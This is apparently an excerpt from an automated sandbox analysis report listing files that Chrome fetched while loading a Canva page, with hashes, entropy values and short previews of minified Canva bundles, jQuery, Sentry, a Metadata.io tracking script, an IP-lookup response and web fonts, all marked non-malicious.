                                                                                                                                                                                                                                                    Preview:/*! For license information please see 76d8b06612b94585.vendor.js.LICENSE.txt */."use strict";(self.webpackChunk_canva_web=self.webpackChunk_canva_web||[]).push([[2653],{286447:(e,t,n)=>{n.d(t,{Q:()=>a});var r=n(239412);function a(e){var t=e.children,n=e.render;t&&n&&console.error("MobX Observer: Do not use children and render in the same time in `Observer`");var a=t||n;return"function"!=typeof a?null:(0,r.S)(a)}a.displayName="Observer"},225881:(e,t,n)=>{n.d(t,{DT:()=>o.D,FY:()=>o.F,Pi:()=>u.P,Qj:()=>s.Q,fv:()=>c.f,jd:()=>l.O});n(828378);var r,a=n(898793),i=n(256727),o=(n(239412),n(831874)),l=n(609121),u=n(749586),s=n(286447),c=n(354621);n(57211),n(176915);(0,i.z0)(a.m);r=l.O.finalizeAllImmediately},749586:(e,t,n)=>{n.d(t,{P:()=>d});var r,a,i=n(875604),o=n(831874),l=n(239412),u="function"==typeof Symbol&&Symbol.for,s=null!==(a=null===(r=Object.getOwnPropertyDescriptor((function(){}),"name"))||void 0===r?void 0:r.configurable)&&void 0!==a&&a,c=u?Symbol.for("react.forward_ref"):"function
                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                    Size (bytes):411
                                                                                                                                                                                                                                                    Entropy (8bit):5.2128423807550925
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:12:kjhskjmRcmnwf0Hz0oW0+NNJ1kOldlJVrK22:kjhskjmWmwsHAoW0gFkOhJlK22
                                                                                                                                                                                                                                                    MD5:CDA459F2F4321C68CEA3296F0945C472
                                                                                                                                                                                                                                                    SHA1:13736CB2FBCF52C840AAB8D9E13A7AEAA22CE7B5
                                                                                                                                                                                                                                                    SHA-256:FFCC7299996CC445BD214A8DE1F108A74D6733F564BB27B194F6DA62216BAE5D
                                                                                                                                                                                                                                                    SHA-512:6B6BBF77F86BB2A0F890C253D6F61DBD734061495E0076659EBEF7EB61FA6D41D53B2FDFDF2CE160851CA24048A8B9614A0B7DA7213E51D0BFC6A415DC1E17B5
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                    URL:https://static.canva.com/web/43ddbdb7757e7317.js
                                                                                                                                                                                                                                                    Preview:(self["webpackChunk_canva_web"] = self["webpackChunk_canva_web"] || []).push([[7620],{../***/ 688165:.function(_, __, __webpack_require__) {__webpack_require__.n_x = __webpack_require__.n;const __web_req__ = __webpack_require__;__web_req__(813110);self._fe4d99ebe0d2d259646a80d250150d47 = self._fe4d99ebe0d2d259646a80d250150d47 || {};(function(__c) {.}).call(self, self._fe4d99ebe0d2d259646a80d250150d47);}..}])
                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):21
                                                                                                                                                                                                                                                    Entropy (8bit):3.594465636961452
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3:YMb1gXME2Y:YMeX32Y
                                                                                                                                                                                                                                                    MD5:909AD59B6307B0CD8BFE7961D4B98778
                                                                                                                                                                                                                                                    SHA1:49F8111D613317EA86C6A45CD608DC96B1C8451B
                                                                                                                                                                                                                                                    SHA-256:FBCEC43F243A7B7F955E498B7FC37CB5EDF615156529AB8A039BBBCFA52C1829
                                                                                                                                                                                                                                                    SHA-512:8FDFFFB73C90ACDC732A0F29257CACEEDAAA28FCAF8E779C5390BDEA9CDE4DE3C8BD005BBEC9B3B7972C787E233D8D8E218D45B6EB2C3AD40EB5E3A2A1EAC3B8
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                    Preview:{"ip":"8.46.123.189"}
                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (65455)
                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                    Size (bytes):370795
                                                                                                                                                                                                                                                    Entropy (8bit):5.311372490047287
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:6144:dzFlje4awAiQ4sFgxA0li4QSfFJAKhIUVr8Q61xw4e1:AWIUVr81xw4e1
                                                                                                                                                                                                                                                    MD5:74C9DEB0CFD613EBF0B30CB5899FBC72
                                                                                                                                                                                                                                                    SHA1:B5C2E7D1D4EA7A1EDBC4F38841904C2BEEBE60C0
                                                                                                                                                                                                                                                    SHA-256:E5834A980D53695EFCD0EBF5BDE122E73AB6C6352B337C84579920B5D37F72E5
                                                                                                                                                                                                                                                    SHA-512:7A6FE44AEE532D11727609EEE9BF8630CC72ADEF881769E789CF51DF5EF4BB2928EABBED2356343FE512ACB8C72923878B8874AC7198A14317502DEC472D89A8
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                    URL:https://static.canva.com/web/a539f22cb4b4cc9e.vendor.js
                                                                                                                                                                                                                                                    Preview:/*! For license information please see a539f22cb4b4cc9e.vendor.js.LICENSE.txt */.(self.webpackChunk_canva_web=self.webpackChunk_canva_web||[]).push([[5436],{968:t=>{var e;window,e=function(){return function(t){var e={};function n(r){if(e[r])return e[r].exports;var o=e[r]={i:r,l:!1,exports:{}};return t[r].call(o.exports,o,o.exports,n),o.l=!0,o.exports}return n.m=t,n.c=e,n.d=function(t,e,r){n.o(t,e)||Object.defineProperty(t,e,{enumerable:!0,get:r})},n.r=function(t){"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(t,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(t,"__esModule",{value:!0})},n.t=function(t,e){if(1&e&&(t=n(t)),8&e)return t;if(4&e&&"object"==typeof t&&t&&t.__esModule)return t;var r=Object.create(null);if(n.r(r),Object.defineProperty(r,"default",{enumerable:!0,value:t}),2&e&&"string"!=typeof t)for(var o in t)n.d(r,o,function(e){return t[e]}.bind(null,o));return r},n.n=function(t){var e=t&&t.__esModule?function(){return t.default}:function(){ret
                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                    Size (bytes):6785
                                                                                                                                                                                                                                                    Entropy (8bit):4.764532758184024
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:192:4rPKbcyONPj2Ix4JA63seKKpJ4zde/rsVJgqecW2RYz2nS6ef/kqy:4rPSchJ2Y4JhserpGZEVqecW2RRS6e0b
                                                                                                                                                                                                                                                    MD5:9C747CF07B2623FE6F77E47F5A134103
                                                                                                                                                                                                                                                    SHA1:7180E5B53413163E10A6CA1E94518AC2CEB7970A
                                                                                                                                                                                                                                                    SHA-256:476CDA2BDE7910A58186B7B58D2BE6D22D3CFACDFEDA3354134B84E43D76AC98
                                                                                                                                                                                                                                                    SHA-512:4C1894FD984FC35FBC725737F68B69982B4E53864EB8BF1B8A5826D4D62C682AD4D50C08BA4EAEE3FBE04D3B91EA22A79559AA77BE6BCF3B81025348C8CEB35A
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                    URL:https://cdn.metadata.io/site-insights.js
                                                                                                                                                                                                                                                    Preview:(function () {. /**. * @type {string} Key for the visitor ID cookie.. */. const visitorIdKey = "Metadata_visitor_id";.. /**. * @type {string} Key for the session ID cookie.. */. const sessionIdKey = "Metadata_session_id";.. /**. * @type {string} IP address of the client.. */. let ip;.. /**. * Account configuration object.. */. const config = {. invalid: true. };.. /**. * Options object.. */. const opts = {. /**. * @type {string} Base URL for the CDN.. */. cdnBaseUrl: "https://cdn.metadata.io/pixel/config",.. /**. * @type {string} Base URL for the API.. */. baseUrl: "https://api-gw.metadata.io",.. /**. * @type {string} Account ID.. */. accountId: null. };.. /**. * Get the value of a cookie.. * @param {string} key - The key of the cookie.. * @returns {string|null} The value of the cookie, or null if not found.. */. const getCookieValue = (key) => {. const cookie = document.cookie.split("; ").find(fu
                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (55289)
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):55418
                                                                                                                                                                                                                                                    Entropy (8bit):5.2011745666689
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:768:7Snb/BBuuGki0usgH8bdwB005NLqrbcSb4sA7CctFzBmBv4L7HelSWVoz8WlqdLZ:70q8berM2bW6X49yWx1ZSDh/33s
                                                                                                                                                                                                                                                    MD5:16E5D529039D25735AE0BA1D610125E8
                                                                                                                                                                                                                                                    SHA1:D7CAA746424A018583EC1E097F74A484C4FB1811
                                                                                                                                                                                                                                                    SHA-256:C6DE703F8EE214808496DCD92795AC8971782935ED75ABDD5624C814E69DAAEA
                                                                                                                                                                                                                                                    SHA-512:56AC6CDABC05070E1440C8CA4A60119B3555B2743BA8652A2A0282701ECC8E150AC343020D620D3F5CD6406F04966CDE54FD797530149AD0B2711E44F89165D0
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                    Preview:/*! @sentry/browser 7.16.0 (5386ce7) | https://github.com/getsentry/sentry-javascript */.var Sentry=function(t){const n=Object.prototype.toString;function e(t){switch(n.call(t)){case"[object Error]":case"[object Exception]":case"[object DOMException]":return!0;default:return h(t,Error)}}function r(t,e){return n.call(t)===`[object ${e}]`}function i(t){return r(t,"ErrorEvent")}function s(t){return r(t,"DOMError")}function o(t){return r(t,"String")}function c(t){return null===t||"object"!=typeof t&&"function"!=typeof t}function u(t){return r(t,"Object")}function a(t){return"undefined"!=typeof Event&&h(t,Event)}function f(t){return Boolean(t&&t.then&&"function"==typeof t.then)}function h(t,n){try{return t instanceof n}catch(t){return!1}}function l(t){return t&&t.Math==Math?t:void 0}const d="object"==typeof globalThis&&l(globalThis)||"object"==typeof window&&l(window)||"object"==typeof self&&l(self)||"object"==typeof global&&l(global)||function(){return this}()||{};function p(t,n,e){const r
                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (1207)
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):2941
                                                                                                                                                                                                                                                    Entropy (8bit):5.703694992734448
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:48:AOAa0nkOEJw0l+zYwvvYFDCwszjSBzXwoKSTwaJtar97mhsX2HfwD+JnWj0TZ8zE:8nJEJwJzvXYFDZszuBzAoKSp20JnWjSt
                                                                                                                                                                                                                                                    MD5:F1580512DE3AC255D76178FC682B9F0C
                                                                                                                                                                                                                                                    SHA1:24B8D0CEFCE6DE4476FA293B9637817E06720745
                                                                                                                                                                                                                                                    SHA-256:0ABB359B05E1F63DA9B876D5B7284F7BE9055C400032847DDE1E142990FCCEBA
                                                                                                                                                                                                                                                    SHA-512:159CF6F40FD1E302E03ABA64B08E9F709A59A49FD094A66737F59B9F1A2FF579E9D0AC39B325A4ADEEE2D0161A7C8D90D6ECEE917D0E638F038D88603F984CBD
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                    Preview:(self["webpackChunk_canva_web"] = self["webpackChunk_canva_web"] || []).push([[1302],{../***/ 153325:.function(_, __, __webpack_require__) {__webpack_require__.n_x = __webpack_require__.n;const __web_req__ = __webpack_require__;__web_req__(813110);self._fe4d99ebe0d2d259646a80d250150d47 = self._fe4d99ebe0d2d259646a80d250150d47 || {};(function(__c) {var JY;var d8a,e8a,h8a,i8a,GY;__c.f8a=function(a){a=d8a(a);return e8a(a)};d8a=function(a){return Object.entries(a).reduce((b,[c,d])=>{"name"!==c&&null!=d&&(c=c.replace(/[-.]/g,"_"),b[c]=d);return b},{})};e8a=function(a){return Object.entries(a).reduce((b,[c,d])=>{if("name"!==c&&null!=d){const f=typeof d;var e=g8a.has(c)&&g8a.get(c)!==f;b[`${c}${e?`_${f}`:""}`]=d}return b},{})};.h8a=function(a){return(b,c,d,e)=>{d/=e;return 0===d?b:1===d?c:b+(c-b)*-Math.pow(2,1/a.amplitude*(d-1)*10)*Math.sin(5*(d-1.1)*Math.PI)}};i8a=function(a){return(b,c,d,e)=>{d/=e;e=c-b;return 0===d?b:1===d||0===e?c:b+e*(Math.pow(2,1/a.amplitude*d*-10)*Math.sin(5*(d-.1)*Mat
                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                    File Type:Web Open Font Format (Version 2), TrueType, length 41508, version 1.0
                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                    Size (bytes):41508
                                                                                                                                                                                                                                                    Entropy (8bit):7.995020245168832
                                                                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                                                                    SSDEEP:768:kEoxtkLck1fY9Ebj8/K0HJ5/LVrK1nTtzgu0hRuddFcALkukQubAaNp:gxtkAk+mbj8/19LVrKxJguyaYALknQul
                                                                                                                                                                                                                                                    MD5:8A83D3EA2E60560BA77BAEC1CCE6881A
                                                                                                                                                                                                                                                    SHA1:C1D1AE592AB0019C8092DABE56875A29D5745B80
                                                                                                                                                                                                                                                    SHA-256:FB1992542FE041232EB0470EC651C97DAC516D86BF11D659B542924307142DC9
                                                                                                                                                                                                                                                    SHA-512:5C85F3C34DBC70FCC76AE45536AD1ACC313E69D7A4DF0E793F5037DA64B230D24A53B730644E5E2CF43780BCD37C70286E32D67001A1EAFE442D7450A6E44F54
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                    URL:https://font-public.canva.com/YAFdJjTk5UU/0/CanvaSans-Medium.95291d1cd5c6185e00ba590.c69c23593c9bd5705c7780a200f2a6db.woff2
                                                                                                                                                                                                                                                    Preview:wOF2.......$.....................................D..n....`..n...........t.....>..6.$..:. ../..{..K[...n.{(....^..M.....).:.....F.F..O;..m..Y.%.......%.".3j...R.<P..)).2.....E..Sw...T......n..o2D...=....s.L.C.)9st..\..D.Y`...r.......U.....J\..................d.....T.l[...a.H...;d.x....%..:.U.u.va.....z...w..q.U..O..9&.4.f'VT..~v.....<....G.(.}..@.K..-.........\..Z.....&....N........f....\.}.\R..cX E.o....!..d.+O..<....s......!$R.G..x....WV.J}V...X.6.X.....m....hn..1...$.E.e......6.0..$|2T.Q..(.....1.....H..vo...`..0.. .............+C....z"A%sh.L&..mf..yo..h..T..... q..1.^.u'...$.z7...q....u.Do~....s...5.L.1...1.0U..h.....0MM..r..4n..[..Z.@.. .,'..o.....~....M....8.D*..)i.....{o..x...$f,.%...7-..z..........k.....c<.Q.$4......Y(p8.#.....4....=?......].....v...!..B"t......3.nf.y*.......?..Y...@...r..<.7.3..`K....n...5........"V.'.J......h.w.?[X`.NRR%5....<............d..r *....B...D.....(].)..C..U..z.ef.}...3...&b5.#..g.F..q..eR. .
                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                    File Type:Unicode text, UTF-8 text, with very long lines (65532), with no line terminators
                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                    Size (bytes):115121
                                                                                                                                                                                                                                                    Entropy (8bit):5.371362815606401
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3072:tX/OXPeGcbWUc/0aHscJYoJyhVVh5XGsj56pY5TS2z5frSiqdE:tX/sPbcbWUXaHscGoIhVVHXGqSK5frf/
                                                                                                                                                                                                                                                    MD5:CB1826AF86C8190CEB1FF4F70E255C6D
                                                                                                                                                                                                                                                    SHA1:83057F32ACAA0D277001D22AEAEC60D141281C3E
                                                                                                                                                                                                                                                    SHA-256:34E60C5656534222F02FC99959F0B48D191CE8A6CF8CC78DCFDA19A794FAED9F
                                                                                                                                                                                                                                                    SHA-512:BA5F119FD4C74B74E310A3EB6451B117F564634208B9D20259D554A3D8749E17ACC39D3DBD2B82DEC7426ADFE4ED61EA24919B9ECEB6EF06BF837491A180D9DB
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                    URL:https://static.canva.com/web/f0398d1166314304.vendor.js
                                                                                                                                                                                                                                                    Preview:"use strict";(self.webpackChunk_canva_web=self.webpackChunk_canva_web||[]).push([[5136],{899171:(t,e,i)=>{i.d(e,{Z:()=>s});const s={Tn:function(t){const e=(t+"=".repeat((4-t.length%4)%4)).replace(/\-/g,"+").replace(/_/g,"/"),i=atob(e),s=new Uint8Array(i.length);for(let n=0;n<i.length;++n)s[n]=i.charCodeAt(n);return s}}},576196:(t,e,i)=>{i.d(e,{G:()=>s});const s={CustomEvent:"ce",Pr:"p",_u:"pc",vc:"ca",Ea:"i",qs:"ie",M:"cci",R:"ccic",I:"ccc",F:"ccd",ql:"ss",xl:"se",Oi:"si",Ei:"sc",Gi:"sbc",Cc:"sfe",mo:"iec",Uu:"lr",zu:"uae",O:"ci",$:"cc",Ju:"lcaa",Eu:"lcar",On:"inc",Ln:"add",Rn:"rem",$n:"set",Bn:"ncam",Ku:"sgu",Fr:"ffi"}},876055:(t,e,i)=>{i.d(e,{Z:()=>s});const s={W:function(){const t=(t=!1)=>{const e=(Math.random().toString(16)+"000000000").substr(2,8);return t?"-"+e.substr(0,4)+"-"+e.substr(4,4):e};return t()+t(!0)+t(!0)+t()}}},19601:(t,e,i)=>{i.d(e,{Z:()=>s});class s{constructor(t,e){this.database=t,this.vd=e,this.parent="undefined"==typeof window?self:window,this.database=t,this.vd=
                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (18662)
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):18726
                                                                                                                                                                                                                                                    Entropy (8bit):5.445341107297658
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:384:LhrTLnyE8b133gsNkiI8KxypGt591Rt/W7agr0/+K8rdrL/6WCk6n20Wpa/I4v:1r/qbZQs+iIHxAGn91Rt+eo0y5XCWCk8
                                                                                                                                                                                                                                                    MD5:317DB91658FDE2A75EF62DE7A2BE822C
                                                                                                                                                                                                                                                    SHA1:81B009EEFC846FE579A556F4032D0BBDC92AD4C1
                                                                                                                                                                                                                                                    SHA-256:4CCF924C756CD3FD697EC71CBA2451BC00591529A14B226E47B67BFE4544DC5D
                                                                                                                                                                                                                                                    SHA-512:E04B2E327D3A50964AC56DC00E4274A0ABDBA19A3D54EEA01B9DAB78CAD7224E5030EFDB816804DE3CEBB54A653C42D048AF41EDFEFCD833250DC557E227EEE5
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                    Preview:(()=>{"use strict";var e,r,t,n,s,f={},i={};function c(e){var r=i[e];if(void 0!==r)return r.exports;var t=i[e]={id:e,loaded:!1,exports:{}};return f[e].call(t.exports,t,t.exports,c),t.loaded=!0,t.exports}c.m=f,c.amdD=function(){throw new Error("define cannot be used indirect")},c.amdO={},e=[],c.O=(r,t,n,s)=>{if(!t){var f=1/0;for(l=0;l<e.length;l++){for(var[t,n,s]=e[l],i=!0,o=0;o<t.length;o++)if((!1&s||f>=s)&&Object.keys(c.O).every((e=>c.O[e](t[o]))))t.splice(o--,1);else if(i=!1,s<f)f=s;if(i){e.splice(l--,1);var a=n();if(void 0!==a)r=a}}return r}else{s=s||0;for(var l=e.length;l>0&&e[l-1][2]>s;l--)e[l]=e[l-1];e[l]=[t,n,s]}},c.n=e=>{var r=e&&e.__esModule?()=>e.default:()=>e;return c.d(r,{a:r}),r},t=Object.getPrototypeOf?e=>Object.getPrototypeOf(e):e=>e.__proto__,c.t=function(e,n){if(1&n)e=this(e);if(8&n)return e;if("object"==typeof e&&e){if(4&n&&e.__esModule)return e;if(16&n&&"function"==typeof e.then)return e}var s=Object.create(null);c.r(s);var f={};r=r||[null,t({}),t([]),t(t)];for(var i=
                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                    Size (bytes):21
                                                                                                                                                                                                                                                    Entropy (8bit):3.594465636961452
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3:YMb1gXME2Y:YMeX32Y
                                                                                                                                                                                                                                                    MD5:909AD59B6307B0CD8BFE7961D4B98778
                                                                                                                                                                                                                                                    SHA1:49F8111D613317EA86C6A45CD608DC96B1C8451B
                                                                                                                                                                                                                                                    SHA-256:FBCEC43F243A7B7F955E498B7FC37CB5EDF615156529AB8A039BBBCFA52C1829
                                                                                                                                                                                                                                                    SHA-512:8FDFFFB73C90ACDC732A0F29257CACEEDAAA28FCAF8E779C5390BDEA9CDE4DE3C8BD005BBEC9B3B7972C787E233D8D8E218D45B6EB2C3AD40EB5E3A2A1EAC3B8
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                    URL:https://api.ipify.org/?format=json
                                                                                                                                                                                                                                                    Preview:{"ip":"8.46.123.189"}
                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (65447)
                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                    Size (bytes):89501
                                                                                                                                                                                                                                                    Entropy (8bit):5.289893677458563
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:1536:DjExXUqJnxDjoXEZxkMV4QYSt0zvDL6gP3h8cApwEIOzVTB/UjPazMdLiX4mQ1v9:DIh8GgP3hujzwbhd3XvSiDQ47GKn
                                                                                                                                                                                                                                                    MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                                                                                                                                                                                                                                                    SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                                                                                                                                                                                                                                                    SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                                                                                                                                                                                                                                                    SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                    URL:https://code.jquery.com/jquery-3.6.0.min.js
                                                                                                                                                                                                                                                    Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                    File Type:Web Open Font Format (Version 2), TrueType, length 43356, version 1.0
                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                    Size (bytes):43356
                                                                                                                                                                                                                                                    Entropy (8bit):7.993891065008076
                                                                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                                                                    SSDEEP:768:2J1Rl2qpFadQeDGv8iMi9ocx1TgGb/RskTsYxOgheSqYIe7l/yHc80ufT:s1REcYPDox1TgGb/WosqHqYH7l/y8y
                                                                                                                                                                                                                                                    MD5:9826ACEF05BD6CD0D11F682A193401DF
                                                                                                                                                                                                                                                    SHA1:CFDAC096A1F2476BC967259A53BF1B71C4B4306B
                                                                                                                                                                                                                                                    SHA-256:717519629F1213B6C58EC652BE28E726006FD45DF705F7F6C631F92EFDF78633
                                                                                                                                                                                                                                                    SHA-512:451B9D635C0386B4171C46364FDD0AB12BE98903BC2721855C3665BFC89068786C0E38BC705B23CA762A06EC91B25BD6D319A9FE234646BBB31FFEF7376FF90E
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                    URL:https://font-public.canva.com/YAFdJjTk5UU/0/CanvaSans-MediumItalic.2114be9bf82cd092e.e5e43f51d6d7939d8911c861efa5f9b7.woff2
                                                                                                                                                                                                                                                    Preview:wOF2.......\......................................D..B..l.`..n...........\..$..>..6.$..:. ..{..{..K[....:e.'.#.n2..f.O.\WP.ka..At..'.j.*.....h../....../J..~f....\p.......!...(Mf.-..m..23..W..%...(...&.e.n..?.....-.5...pVD .H{.......} .Zb.\.q.+.U......l&.pKY.k.U.w.F..{..O.K...*...sA.....#0".,W......sq....k../:.l..X...<...AOC|c.p..:C..JH2.....X^.:.8;.s...%:!........[.y...[?.[#d%v...+E.......d._....2oP].....$.[..R..2..=Y...x...<...x.C.+d...EZ..t.q2zj..g...^.`.....y.....FD.lq.W=.%.hZV.J...#.'.yZ[....,....>.$.. ......:...\RE........ ....gf.W..u.....t..e.s....J+. ."...sA.._.SPD.T.\|..s^i..7;...{.,.....r..._:...k.......[2..ks..J...:.P.i...P..L.`L..b..EV..x".$..tO........,.Ya.!...&.3...R.\.YNG9...yB..#.......;i.......`..LU.p.....q...Y.~.$c..B[\ ........g....K.cZDezy ..........Z...3L.GP2..J(.).k.V.C(..a..*.Y..9.*...;...W...pK.....8<?.Rhw]w.O._...}zf....P!.M.B.z.....8...P^..................m....._.Z.n.u.%<.r..|B1..o.y.}......1{E.J..B 4....h..D..C..,*7..
                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):65
                                                                                                                                                                                                                                                    Entropy (8bit):4.314128390879881
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3:2erWeKBRk35KLWAzRERxzfRX/H4Y3:29M3tRdfZN
                                                                                                                                                                                                                                                    MD5:83A02FE42F8C2198E7C608AFF363AA49
                                                                                                                                                                                                                                                    SHA1:7B20AE1014450492CC708E3C9DC7522B05C2EFFD
                                                                                                                                                                                                                                                    SHA-256:E64954DC34E12C7190CC2338A54B07644FF0F102AA71CC7209BCBB49C3009F7C
                                                                                                                                                                                                                                                    SHA-512:CD381A8C725C892E9A68D713254A31EA9ED25A39B212A5DC52D4BA2655F38AFDDB32519F03360F32A59D8E7701AF6C2AD0030A6AA760C3DE87C75063F5B65F54
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                    Preview:event: message.data: {"response":{"status_code":200,"body":""}}..
                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                    Size (bytes):16
                                                                                                                                                                                                                                                    Entropy (8bit):3.5
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3:H+rYn:D
                                                                                                                                                                                                                                                    MD5:F1C9C44E663E7E62582E3F5B236C1C72
                                                                                                                                                                                                                                                    SHA1:E142F3A0C2D1CDF175A5C3AF43AD66FEFE208B1F
                                                                                                                                                                                                                                                    SHA-256:D843E67FBFA1F5CB0024062861EE26860C5A866F80755CF39B3465459A8538B9
                                                                                                                                                                                                                                                    SHA-512:19FE62CB9D884BB3424C51DD15E74EB22E5A639BABF8398BACEBB781862296FA0D7AEE39C88CB9C7AF5791FD58830AC3433F5C6BD94B1BA3912AB33151E93452
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                    URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISEAna_H5bggF6IBIFDTcwqTA=?alt=proto
                                                                                                                                                                                                                                                    Preview:CgkKBw03MKkwGgA=
                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                    File Type:MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
                                                                                                                                                                                                                                                    Category:dropped
